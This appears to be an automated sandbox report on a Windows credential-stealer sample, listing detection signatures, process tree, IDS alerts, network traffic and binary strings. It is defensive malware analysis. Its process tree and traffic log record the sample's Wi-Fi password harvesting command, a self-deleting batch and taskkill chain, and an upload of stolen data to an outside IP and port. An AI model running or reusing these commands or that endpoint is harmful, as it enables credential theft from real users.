Edit tour

Windows Analysis Report
VaXmr82RIb.exe

Overview

General Information

Sample name:	VaXmr82RIb.exe
Analysis ID:	1568299
MD5:	3e11e285b883807eb038196ea1de3cf8
SHA1:	b7346061f7e70ecabf1831fe964e4d0080b31ea9
SHA256:	1003ed3cc55ba1b802f8c831b6f29dc304b163c58c222f884a22ce338fdf75c0
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

PE file contains section with special chars

Queries memory information (via WMI often done to detect virtual machines)

Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Uses netsh to modify the Windows network and firewall settings

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

VaXmr82RIb.exe (PID: 3364 cmdline: "C:\Users\user\Desktop\VaXmr82RIb.exe" MD5: 3E11E285B883807EB038196EA1DE3CF8)

cmd.exe (PID: 484 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

tasklist.exe (PID: 3528 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

cmd.exe (PID: 3396 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

chcp.com (PID: 5248 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)

netsh.exe (PID: 5176 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 7184 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6696 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

chcp.com (PID: 6076 cmdline: chcp 65001 MD5: 41146159AA3D41A92B53ED311EE15693)

taskkill.exe (PID: 6740 cmdline: TaskKill /F /IM 3364 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 7288 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

WerFault.exe (PID: 2588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 3324 MD5: 40A149513D721F096DDF50C04DA2F01F)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: VaXmr82RIb.exe PID: 3364	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\VaXmr82RIb.exe", ParentImage: C:\Users\user\Desktop\VaXmr82RIb.exe, ParentProcessId: 3364, ParentProcessName: VaXmr82RIb.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 3396, ProcessName: cmd.exe

Suricata Signatures

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T14:44:39.658760+0100	2843856	1	A Network Trojan was detected	192.168.11.20	49747	89.23.100.233	1488	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: VaXmr82RIb.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: VaXmr82RIb.exe

ReversingLabs: Detection: 60%

Machine Learning detection for sample

Source: VaXmr82RIb.exe

Joe Sandbox ML: detected

Source: VaXmr82RIb.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Xml.pdbHx source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Xml.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: mscorlib.pdb@ source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DA5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Drawing.pdbRSDSp source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.pdb0$; source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: Stealer.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: ntkrnlmp.pdb source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DA5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.IO.Compression.pdbu source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Net.Http.pdbMZ source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Net.Http.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Security.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.IO.Compression.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: (3)\Stealer\obj\Release\Stealer.pdb source: VaXmr82RIb.exe
Source:	Binary string: System.Configuration.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Xml.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Core.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: mscorlib.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: (3)\Stealer\obj\Release\Stealer.pdb, source: VaXmr82RIb.exe
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Net.Http.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Management.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Drawing.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Management.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Core.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\tdata*4&)G source: VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007DC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS] source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Management.pdb.> source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Net.Http.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.ni.pdb source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER9BB8.tmp.dmp.17.dr
Source:	Binary string: System.Security.pdb8 source: WER9BB8.tmp.dmp.17.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.11.20:49747 -> 89.23.100.233:1488

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 1488
Source: unknown	Network traffic detected: HTTP traffic on port 1488 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 1488 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 1488 -> 49747

Source: global traffic

TCP traffic: 192.168.11.20:49747 -> 89.23.100.233:1488

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="f093b59e-f0fc-499e-9213-ca04fdeb1c2d"Host: 89.23.100.233:1488Content-Length: 133518Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 89.23.100.233 89.23.100.233
Source: Joe Sandbox View	IP Address: 104.16.184.241 104.16.184.241

Source: Joe Sandbox View

ASN Name: MAXITEL-ASRU MAXITEL-ASRU

Source: unknown

DNS query: name: icanhazip.com

Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.100.233
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: 246.229.1.0.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /upload HTTP/1.1Content-Type: multipart/form-data; boundary="f093b59e-f0fc-499e-9213-ca04fdeb1c2d"Host: 89.23.100.233:1488Content-Length: 133518Expect: 100-continueConnection: Keep-Alive

Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://89.23.100.233:1488
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://89.23.100.233:1488/uploadt
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003687000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmp7983.tmp.dat.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: tmp7983.tmp.dat.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp795F.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp795F.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tmp7983.tmp.dat.0.dr	String found in binary or memory: https://gemini.google.com/app?q=
Source: tmp7980.tmp.dat.0.dr	String found in binary or memory: https://login.live.com/
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003726000.00000004.00000800.00020000.00000000.sdmp, tmp7980.tmp.dat.0.dr	String found in binary or memory: https://login.live.com//
Source: tmp7980.tmp.dat.0.dr	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: VaXmr82RIb.exe, 00000000.00000002.30075096336.0000000003726000.00000004.00000800.00020000.00000000.sdmp, tmp7980.tmp.dat.0.dr	String found in binary or memory: https://login.live.com/v104
Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004723000.00000004.00000800.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30086163868.0000000007E71000.00000004.00000020.00020000.00000000.sdmp, VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004744000.00000004.00000800.00020000.00000000.sdmp, tmp7982.tmp.dat.0.dr, tmp7981.tmp.dat.0.dr, tmp7983.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: VaXmr82RIb.exe, 00000000.00000002.30079781920.0000000004666000.00000004.00000800.00020000.00000000.sdmp, tmp795D.tmp.dat.0.dr, tmp7960.tmp.dat.0.dr, tmp795F.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

PE file contains section with special chars

Source: VaXmr82RIb.exe	Static PE information: section name: .<':
Source: VaXmr82RIb.exe	Static PE information: section name: .#x#
Source: VaXmr82RIb.exe	Static PE information: section name: .4j;

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036040F8 NtClose,	0_2_036040F8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03604688 NtAllocateVirtualMemory,	0_2_03604688
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036045B0 NtProtectVirtualMemory,	0_2_036045B0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03604AA8 NtCreateSection,	0_2_03604AA8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036049D0 NtOpenFile,	0_2_036049D0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03604E08 NtDeviceIoControlFile,	0_2_03604E08
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03604D40 NtQueryVolumeInformationFile,	0_2_03604D40
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03604C50 NtMapViewOfSection,	0_2_03604C50
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036040F0 NtClose,	0_2_036040F0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03604681 NtAllocateVirtualMemory,	0_2_03604681
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036045A8 NtProtectVirtualMemory,	0_2_036045A8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03604AA1 NtCreateSection,	0_2_03604AA1
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036049C9 NtOpenFile,	0_2_036049C9
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03604E01 NtDeviceIoControlFile,	0_2_03604E01
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03604D38 NtQueryVolumeInformationFile,	0_2_03604D38
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03604C48 NtMapViewOfSection,	0_2_03604C48

Source: C:\Users\user\Desktop\VaXmr82RIb.exe

Code function: 0_2_03604E08: NtDeviceIoControlFile,

0_2_03604E08

Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034ADB60	0_2_034ADB60
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034AA281	0_2_034AA281
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034AC2A8	0_2_034AC2A8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034A9908	0_2_034A9908
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034AA100	0_2_034AA100
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034AC010	0_2_034AC010
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034A1098	0_2_034A1098
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034A8F80	0_2_034A8F80
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034A8E40	0_2_034A8E40
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034AB518	0_2_034AB518
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034A99A0	0_2_034A99A0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034AC001	0_2_034AC001
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034AA0F0	0_2_034AA0F0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034A1088	0_2_034A1088
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034A8F70	0_2_034A8F70
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034AF700	0_2_034AF700
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034A8E10	0_2_034A8E10
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034A9690	0_2_034A9690
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034A96A0	0_2_034A96A0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034A8DA0	0_2_034A8DA0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_034ABCD2	0_2_034ABCD2
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03606280	0_2_03606280
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036071B0	0_2_036071B0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036035A0	0_2_036035A0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_0360F4D0	0_2_0360F4D0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03602490	0_2_03602490
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03608B58	0_2_03608B58
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036038A0	0_2_036038A0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_0360DD40	0_2_0360DD40
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03600D00	0_2_03600D00
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_0360F3EF	0_2_0360F3EF
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03608149	0_2_03608149
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03608158	0_2_03608158
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03602058	0_2_03602058
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_0360D0F8	0_2_0360D0F8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036020D0	0_2_036020D0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036017A0	0_2_036017A0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036017B0	0_2_036017B0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_036039E8	0_2_036039E8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03603870	0_2_03603870
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03608E70	0_2_03608E70
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03604EE0	0_2_03604EE0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_0360DD32	0_2_0360DD32
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_03600CF0	0_2_03600CF0
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07854318	0_2_07854318
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_0785AF90	0_2_0785AF90
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07854C98	0_2_07854C98
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07856A20	0_2_07856A20
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_0785A9E8	0_2_0785A9E8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07851408	0_2_07851408
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_078570A8	0_2_078570A8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_078538F8	0_2_078538F8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_0785C730	0_2_0785C730
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07852418	0_2_07852418
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_078523FE	0_2_078523FE
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07854317	0_2_07854317
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_0785C018	0_2_0785C018
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07854C87	0_2_07854C87
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_078517E4	0_2_078517E4
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_078513FE	0_2_078513FE
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07857E97	0_2_07857E97
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_078570A8	0_2_078570A8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07853B9E	0_2_07853B9E
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_078538E8	0_2_078538E8
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07851800	0_2_07851800
Source: C:\Users\user\Desktop\VaXmr82RIb.exe	Code function: 0_2_07B3E770	0_2_07B3E770
